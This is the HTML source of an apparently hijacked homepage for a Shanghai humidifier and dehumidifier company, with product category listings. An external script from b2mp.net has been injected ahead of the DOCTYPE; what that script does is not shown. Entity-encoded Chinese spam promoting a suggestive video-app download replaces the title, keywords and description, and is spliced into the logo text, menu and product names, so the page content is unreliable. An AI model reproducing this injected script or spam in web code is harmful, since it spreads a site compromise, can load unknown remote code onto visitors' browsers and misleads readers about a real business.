```<script src="//www.b2mp.net/xx.js?2021012722"></script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>&#27185;&#26691;&#35270;&#39057;&#97;&#112;&#112;&#19979;&#36733;&#22320;&#22336;&#32;&#45;&#32;&#27185;&#26691;&#35270;&#39057;&#97;&#112;&#112;&#19979;&#36733;&#22320;&#22336;&#27745;&#32;&#45;&#32;&#27185;&#26691;&#35270;&#39057;&#97;&#112;&#112;&#19979;&#36733;&#27745;&#20813;&#36153;&#32;&#45;&#32;&#27185;&#26691;&#35270;&#39057;&#97;&#112;&#112;&#20813;&#36153;&#26080;&#38480;&#35266;&#30475;&#27745;</title>
<meta name="keywords" content=&#27185;&#26691;&#35270;&#39057;&#97;&#112;&#112;&#19979;&#36733;&#22320;&#22336;&#44;&#27185;&#26691;&#35270;&#39057;&#97;&#112;&#112;&#19979;&#36733;&#22320;&#22336;&#27745;&#44;&#27185;&#26691;&#35270;&#39057;&#97;&#112;&#112;&#19979;&#36733;&#27745;&#20813;&#36153;&#44;&#27185;&#26691;&#35270;&#39057;&#97;&#112;&#112;&#20813;&#36153;&#26080;&#38480;&#35266;&#30475;&#27745; />
<meta name="description" content=&#27426;&#36814;&#35775;&#38382;&#78;&#74;&#65;&#86;&#23548;&#33322;&#12304;&#119;&#119;&#119;&#46;&#110;&#106;&#97;&#118;&#46;&#110;&#101;&#116;&#12305;&#33;&#27185;&#26691;&#35270;&#39057;&#97;&#112;&#112;&#19979;&#36733;&#22320;&#22336;&#44;&#27185;&#26691;&#35270;&#39057;&#97;&#112;&#112;&#19979;&#36733;&#22320;&#22336;&#27745;&#44;&#27185;&#26691;&#35270;&#39057;&#97;&#112;&#112;&#19979;&#36733;&#27745;&#20813;&#36153;&#44;&#27185;&#26691;&#35270;&#39057;&#97;&#112;&#112;&#20813;&#36153;&#26080;&#38480;&#35266;&#30475;&#27745;&#44;&#29255;&#28304;&#20016;&#23500;&#12289;&#20869;&#23481;&#20840;&#38754;&#44;&#27880;&#24847;&#33258;&#25105;&#20445;&#25252;&#44;&#36866;&#24230;&#35266;&#30475;&#24433;&#12289;&#21512;&#29702;&#23433;&#25490;&#26102;&#38388;&#12289;&#20139;&#21463;&#20581;&#24247;&#29983;&#27963;&#33; />
<link rel="canonical" href="http://www.b2mp.net/"/>
<meta name="mobile-agent" content="format=xhtml;url=http://m.b2mp.net/" />
<meta name="mobile-agent" content="format=html5;url=http://wap.b2mp.net/" />
<link href="http://m.b2mp.net/" rel="alternate" media="only screen and (max-width: 640px)" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
<meta http-equiv="Cache-Control" content="no-transform" /><style type="text/css">
<!--
/*定義商品圖片鏈接樣式*/
.this_div_img {width:158px; height:128px; background:#FFFFFF; text-align:center; vertical-align:middle; padding:2px; border:solid 1px #CCCCCC;}
.this_div_img2 {width:188px; height:158px; background:#FFFFFF; text-align:center; vertical-align:middle; padding:2px; border:solid 1px #CCCCCC;}
-->
</style>
<script type="text/javascript" src="./includes/gw_chgimg_wh.js"></script>
<link href="./includes/style.css" rel="stylesheet" type="text/css">
<style type="text/css">
<!--
/*定義商品圖片鏈接樣式*/
.this_div_img {width:158px; height:128px; background:#FFFFFF; text-align:center; vertical-align:middle; padding:2px; border:solid 1px #cccccc;}
.con_style img {background:#FFFFFF; text-align:center; vertical-align:middle; padding:2px; border:solid 1px #dddddd;}
-->
</style>
</head><body>
<div id="div_main"><table border="0" cellpadding="0" cellspacing="0" style="width:100%; margin-bottom:10px;">
 <tr>
  <td style="width:80%;"><a id="f337b38b76" href="/index.html"><img src="images/logo.jpg" alt="上海&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#27745;&#20813;&#36153;空氣淨化設備技術有限公司" border="0" /></a></td>
  <td style="width:20%; text-align:right; vertical-align:top;">
<a id="f337b38b76" href="#" onclick="this.style.behavior='url(#default#homepage)';this.setHomePage('/');" class="homepage">設為首頁</a>
<a id="f337b38b76" href="#" onclick="window.external.AddFavorite(document.locations.href,document.title)" class="favicon">加入收藏</a>
  </td>
 </tr>
</table><table border="0" cellpadding="0" cellspacing="0" style="width:100%; margin-bottom:10px;">
 <tr>
  <td style="width:5px; height:36px;"><img src="images/menu_left.gif" alt="" border="0" /></td>
  <td style="background:url(images/menu_bg.gif);">
<table border="0" cellpadding="0" cellspacing="0" style="width:100%;">
 <tr>
  <td style="width:13%; text-align:center;" class="menu_bg_line"><a id="f337b38b76" href="index.asp" class="menu">公司簡介</a></td>
  <td style="width:15%; text-align:center;" class="menu_bg_line"><a id="f337b38b76" href="product.asp" class="menu">產品展示</a></td>
  <td style="width:15%; text-align:center;" class="menu_bg_line"><a id="f337b38b76" href="case.asp" class="menu">成功案例</a></td>
    <td style="width:15%; text-align:center;" class="menu_bg_line"><a id="f337b38b76" href="fw.asp" class="menu">售後服務</a></td>
  <td style="width:15%; text-align:center;" class="menu_bg_line"><a id="f337b38b76" href="message.asp" class="menu">在線留言</a></td>
  <td style="width:15%; text-align:center;"><a id="f337b38b76" href="contact.asp" class="menu">聯係&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;</a></td>
  <td style="color:#ffffff; text-align:right;">今天是：2020-10-21&nbsp; 星期三</td>
 </tr>
</table>
  </td>
  <td style="width:5px;"><img src="images/menu_right.gif" alt="" border="0" /></td>
 </tr>
</table><div id="f337b38b76" style="text-align:center; margin-bottom:10px;">
<!--<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="990" height="250">
	<param name="movie" value="images/banner.swf" />
    <param name="quality" value="high" />
    <param name="wmode" value="transparent" />
    <embed src="images/banner.swf" width="990" height="250" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent"></embed>
</object>-->
<img src="images/banner.jpg" style="margin:0 auto; max-width:100%; height:auto;" />
</div>
<table border="0" cellpadding="0" cellspacing="0" style="width:100%;">
 <tr>
  <td style="width:26%; padding-right:10px; vertical-align:top;">
<div id="f337b38b76" style="padding:1px; border:solid 1px #cccccc;">
<div id="f337b38b76" style="padding-left:10px; background:url(images/title_bg1.jpg); line-height:30px;" class="text1">圖片展示</div>
<div id="f337b38b76" style="padding:7px 5px 7px 5px; height:auto!important; height:190px; min-height:190px; line-height:22px; text-align:center; vertical-align:top;">
<!-- 播放器 begin -->
<script language="javascript" type="text/javascript" src="gw_swf1/gw_swf1.js"></script>
<script language="javascript" type="text/javascript">
//參數說明：
//swf_objname,swf_wmode,swf_bgcolor：FLASH對象ID,背景色透明模式(0透明,1不透明),背景色
//img_width,img_height,text_height：圖片寬,圖片高,文字標題高度(最佳為20,不顯示設為0即可)
//img_urls,img_links,img_texts：圖片地址,圖片鏈接,圖片標題(都以|為分隔符)
gw_swf1("flash1",0,"#ffffff",225,195,0,"gw_swf1/1.jpg|gw_swf1/2.jpg|gw_swf1/3.jpg|gw_swf1/4.jpg","","");
</script>
<!-- 播放器 end -->
</div>
</div>
<div id="f337b38b76" style="padding:1px; border:solid 1px #cccccc; margin-top:10px;">
<div id="f337b38b76" style="padding-left:10px; background:url(images/title_bg1.jpg); line-height:30px;" class="text1">產品列表</div>
<div id="f337b38b76" style="padding:7px 5px 7px 5px; height:auto!important; height:190px; min-height:190px; line-height:22px; text-align:left; vertical-align:top;"><script type="text/javascript">
<!--//
function gw_sortshow2(id) {
	window.document.getElementById("gw_sorttable1_" + id).style.display="";
	window.document.getElementById("a_img2_" + id).title="收縮";
	window.document.getElementById("a_img2_" + id).href="javascript:gw_sorthide2('" + id + "');";
}
function gw_sorthide2(id) {
	window.document.getElementById("gw_sorttable1_" + id).style.display="none";
	window.document.getElementById("a_img2_" + id).title="展開";
	window.document.getElementById("a_img2_" + id).href="javascript:gw_sortshow2('" + id + "');";
}
//-->
</script><div id="f337b38b76" style="padding:2px 0px 0px 15px; border-bottom:dashed 1px #dddddd;">
 <div id="f337b38b76" style="padding:2px 0px 5px 15px;"><img src="images/icon2.jpg" /> <a id="a_img2_153" href="javascript:gw_sortshow2(153);" class="sort1"><strong>超聲波加濕器</strong></a></div>
 <div id="gw_sorttable1_153" style="padding:0px 0px 2px 0px; display:none;"><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=167" class="sort2">&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#27745;&#20813;&#36153;加濕器 3公斤</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=168" class="sort2">&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;&#27745;加濕器 6公斤</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=169" class="sort2">&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;加濕器 9公斤</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=170" class="sort2">&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;&#27745;加濕器 12公斤</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=171" class="sort2">&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#27745;&#20813;&#36153;加濕器 15公斤</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=172" class="sort2">&#27185;&#26691;&#35270;&#39057;app&#20813;&#36153;&#26080;&#38480;&#35266;&#30475;&#27745;加濕器 18公斤</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=173" class="sort2">&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#22320;&#22336;加濕器 21公斤</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=174" class="sort2">&#27185;&#26691;&#35270;&#39057;app&#20813;&#36153;&#26080;&#38480;&#35266;&#30475;&#27745;加濕器 24公斤</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=175" class="sort2">&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#27745;&#20813;&#36153;加濕器 27公斤</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=176" class="sort2">&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#27745;&#20813;&#36153;加濕器 30公斤</a><!--(1)--></a></div> </div>
</div><div id="f337b38b76" style="padding:2px 0px 0px 15px; border-bottom:dashed 1px #dddddd;">
 <div id="f337b38b76" style="padding:2px 0px 5px 15px;"><img src="images/icon2.jpg" /> <a id="a_img2_154" href="javascript:gw_sortshow2(154);" class="sort1"><strong>超市專用加濕器</strong></a></div>
 <div id="gw_sorttable1_154" style="padding:0px 0px 2px 0px; display:none;"><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=177" class="sort2">超市   3KG</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=178" class="sort2">超市  6KG</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=179" class="sort2">超市  9KG</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=180" class="sort2">超市  12KG</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=181" class="sort2">超市  15KG</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=182" class="sort2">超市  18KG</a><!--(1)--></a></div> </div>
</div><div id="f337b38b76" style="padding:2px 0px 0px 15px; border-bottom:dashed 1px #dddddd;">
 <div id="f337b38b76" style="padding:2px 0px 5px 15px;"><img src="images/icon2.jpg" /> <a id="a_img2_155" href="javascript:gw_sortshow2(155);" class="sort1"><strong>電極加濕器</strong></a></div>
 <div id="gw_sorttable1_155" style="padding:0px 0px 2px 0px; display:none;"><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=183" class="sort2">電極 - 獨立型</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=184" class="sort2">電極 - 風道型</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=185" class="sort2">電極 - 噴杆</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=186" class="sort2">電極-OEM3</a><!--(1)--></a></div> </div>
</div><div id="f337b38b76" style="padding:2px 0px 0px 15px; border-bottom:dashed 1px #dddddd;">
 <div id="f337b38b76" style="padding:2px 0px 5px 15px;"><img src="images/icon2.jpg" /> <a id="a_img2_156" href="javascript:gw_sortshow2(156);" class="sort1"><strong>電熱加濕器</strong></a></div>
 <div id="gw_sorttable1_156" style="padding:0px 0px 2px 0px; display:none;"><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=187" class="sort2">電熱</a><!--(1)--></a></div> </div>
</div><div id="f337b38b76" style="padding:2px 0px 0px 15px; border-bottom:dashed 1px #dddddd;">
 <div id="f337b38b76" style="padding:2px 0px 5px 15px;"><img src="images/icon2.jpg" /> <a id="a_img2_157" href="javascript:gw_sortshow2(157);" class="sort1"><strong>吊頂除濕機</strong></a></div>
 <div id="gw_sorttable1_157" style="padding:0px 0px 2px 0px; display:none;"><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=189" class="sort2">吊頂除濕機  18 升</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=190" class="sort2">吊頂除濕機  50 升</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=191" class="sort2">吊頂除濕機 90 升</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=188" class="sort2">吊頂除濕機 150 升</a><!--(1)--></a></div> </div>
</div><div id="f337b38b76" style="padding:2px 0px 0px 15px; border-bottom:dashed 1px #dddddd;">
 <div id="f337b38b76" style="padding:2px 0px 5px 15px;"><img src="images/icon2.jpg" /> <a id="a_img2_158" href="javascript:gw_sortshow2(158);" class="sort1"><strong>幹蒸汽加濕器</strong></a></div>
 <div id="gw_sorttable1_158" style="padding:0px 0px 2px 0px; display:none;"><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=192" class="sort2">幹蒸汽  電動式</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=193" class="sort2">幹蒸汽 電磁閥式</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=194" class="sort2">幹蒸汽 手動式S</a><!--(1)--></a></div> </div>
</div><div id="f337b38b76" style="padding:2px 0px 0px 15px; border-bottom:dashed 1px #dddddd;">
 <div id="f337b38b76" style="padding:2px 0px 5px 15px;"><img src="images/icon2.jpg" /> <a id="a_img2_159" href="javascript:gw_sortshow2(159);" class="sort1"><strong>高壓微霧加濕器</strong></a></div>
 <div id="gw_sorttable1_159" style="padding:0px 0px 2px 0px; display:none;"><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=195" class="sort2">LGW-501</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=196" class="sort2">LGW-602</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=197" class="sort2">LGW-604</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=198" class="sort2">LGW-608</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=199" class="sort2">LGW-612</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=200" class="sort2">LGW-615</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=201" class="sort2">LGW-621</a><!--(1)--></a></div> </div>
</div><div id="f337b38b76" style="padding:2px 0px 0px 15px; border-bottom:dashed 1px #dddddd;">
 <div id="f337b38b76" style="padding:2px 0px 5px 15px;"><img src="images/icon2.jpg" /> <a id="a_img2_162" href="javascript:gw_sortshow2(162);" class="sort1"><strong>機房專用加濕器</strong></a></div>
 <div id="gw_sorttable1_162" style="padding:0px 0px 2px 0px; display:none;"><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=215" class="sort2">濕膜3KG</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=216" class="sort2">濕膜3.5KG</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=217" class="sort2">濕膜9KG</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=218" class="sort2">濕膜14KG</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=219" class="sort2">濕膜20KG</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=220" class="sort2">濕膜30KG</a><!--(1)--></a></div> </div>
</div><div id="f337b38b76" style="padding:2px 0px 0px 15px; border-bottom:dashed 1px #dddddd;">
 <div id="f337b38b76" style="padding:2px 0px 5px 15px;"><img src="images/icon2.jpg" /> <a id="a_img2_163" href="javascript:gw_sortshow2(163);" class="sort1"><strong>冷庫氣調庫加濕器</strong></a></div>
 <div id="gw_sorttable1_163" style="padding:0px 0px 2px 0px; display:none;"><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=221" class="sort2">氣調庫</a><!--(1)--></a></div> </div>
</div><div id="f337b38b76" style="padding:2px 0px 0px 15px; border-bottom:dashed 1px #dddddd;">
 <div id="f337b38b76" style="padding:2px 0px 5px 15px;"><img src="images/icon2.jpg" /> <a id="a_img2_164" href="javascript:gw_sortshow2(164);" class="sort1"><strong>離心加濕器</strong></a></div>
 <div id="gw_sorttable1_164" style="padding:0px 0px 2px 0px; display:none;"><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=222" class="sort2">離心加濕器吊頂式</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=223" class="sort2">手推式離心加濕器</a><!--(1)--></a></div> </div>
</div><div id="f337b38b76" style="padding:2px 0px 0px 15px; border-bottom:dashed 1px #dddddd;">
 <div id="f337b38b76" style="padding:2px 0px 5px 15px;"><img src="images/icon2.jpg" /> <a id="a_img2_166" href="javascript:gw_sortshow2(166);" class="sort1"><strong>中央空調專用加濕器</strong></a></div>
 <div id="gw_sorttable1_166" style="padding:0px 0px 2px 0px; display:none;"><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=229" class="sort2">中央空調專用  進口濕膜</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=230" class="sort2">中央空調專用  循環水</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=231" class="sort2">中央空調專用  直排水</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=232" class="sort2">中央空調專用 風管式</a><!--(1)--></a></div> </div>
</div><div id="f337b38b76" style="padding:2px 0px 0px 15px; border-bottom:dashed 1px #dddddd;">
 <div id="f337b38b76" style="padding:2px 0px 5px 15px;"><img src="images/icon2.jpg" /> <a id="a_img2_160" href="javascript:gw_sortshow2(160);" class="sort1"><strong>工業除濕機</strong></a></div>
 <div id="gw_sorttable1_160" style="padding:0px 0px 2px 0px; display:none;"><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=202" class="sort2">除濕機  7 KG</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=203" class="sort2">除濕機  7S KG</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=204" class="sort2">除濕機  10S KG</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=205" class="sort2">除濕機  15S KG</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=206" class="sort2">除濕機  20S KG</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=207" class="sort2">除濕機  30S KG</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=208" class="sort2">除濕機  40S KG</a><!--(1)--></a></div> </div>
</div><div id="f337b38b76" style="padding:2px 0px 0px 15px; border-bottom:dashed 1px #dddddd;">
 <div id="f337b38b76" style="padding:2px 0px 5px 15px;"><img src="images/icon2.jpg" /> <a id="a_img2_161" href="javascript:gw_sortshow2(161);" class="sort1"><strong>管道除濕機</strong></a></div>
 <div id="gw_sorttable1_161" style="padding:0px 0px 2px 0px; display:none;"><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=209" class="sort2">管道除濕機  3.7  公斤</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=210" class="sort2">管道除濕機  7  公斤</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=211" class="sort2">管道除濕機  10  公斤</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=212" class="sort2">管道除濕機  15  公斤</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=213" class="sort2">管道除濕機  20  公斤</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=214" class="sort2">管道除濕機  40  公斤</a><!--(1)--></a></div> </div>
</div><div id="f337b38b76" style="padding:2px 0px 0px 15px; border-bottom:dashed 1px #dddddd;">
 <div id="f337b38b76" style="padding:2px 0px 5px 15px;"><img src="images/icon2.jpg" /> <a id="a_img2_165" href="javascript:gw_sortshow2(165);" class="sort1"><strong>民用除濕機</strong></a></div>
 <div id="gw_sorttable1_165" style="padding:0px 0px 2px 0px; display:none;"><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=224" class="sort2">除濕機 18L</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=225" class="sort2">除濕機 30L</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=226" class="sort2">除濕機 50L</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=227" class="sort2">除濕機 90L</a><!--(1)--></a></div><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=228" class="sort2">除濕機 150L</a><!--(1)--></a></div> </div>
</div><div id="f337b38b76" style="padding:2px 0px 0px 15px; border-bottom:dashed 1px #dddddd;">
 <div id="f337b38b76" style="padding:2px 0px 5px 15px;"><img src="images/icon2.jpg" /> <a id="a_img2_233" href="javascript:gw_sortshow2(233);" class="sort1"><strong>恒溫恒濕機</strong></a></div>
 <div id="gw_sorttable1_233" style="padding:0px 0px 2px 0px; display:none;"><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=234" class="sort2">風冷式恒溫恒濕機</a><!--(1)--></a></div> </div>
</div><div id="f337b38b76" style="padding:2px 0px 0px 15px; border-bottom:dashed 1px #dddddd;">
 <div id="f337b38b76" style="padding:2px 0px 5px 15px;"><img src="images/icon2.jpg" /> <a id="a_img2_237" href="javascript:gw_sortshow2(237);" class="sort1"><strong>烤煙回潮機</strong></a></div>
 <div id="gw_sorttable1_237" style="padding:0px 0px 2px 0px; display:none;"><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=238" class="sort2">回潮機</a><!--(1)--></a></div> </div>
</div><div id="f337b38b76" style="padding:2px 0px 0px 15px; border-bottom:dashed 1px #dddddd;">
 <div id="f337b38b76" style="padding:2px 0px 5px 15px;"><img src="images/icon2.jpg" /> <a id="a_img2_239" href="javascript:gw_sortshow2(239);" class="sort1"><strong>步入式恒溫恒濕房</strong></a></div>
 <div id="gw_sorttable1_239" style="padding:0px 0px 2px 0px; display:none;"><div id="f337b38b76" style="padding:2px 0px 2px 30px;"><img src="images/list_2.gif" /><a id="f337b38b76" href="./product.asp?s_sortid2=240" class="sort2">恒溫恒濕實驗室</a><!--(1)--></a></div> </div>
</div></div>
</div></div>
</div>
<div id="f337b38b76" style="padding:1px; border:solid 1px #cccccc; margin-top:10px;">
<div id="f337b38b76" style="padding-left:10px; background:url(images/title_bg1.jpg); line-height:30px;" class="text1">聯係&#27185;&#26691;&#35270;&#39057;app&#19979;&#36733;&#27745;&#20813;&#36153;</div>
<div id="f337b38b76" style="padding:7px 5px 7px 10px; line-height:25px;">
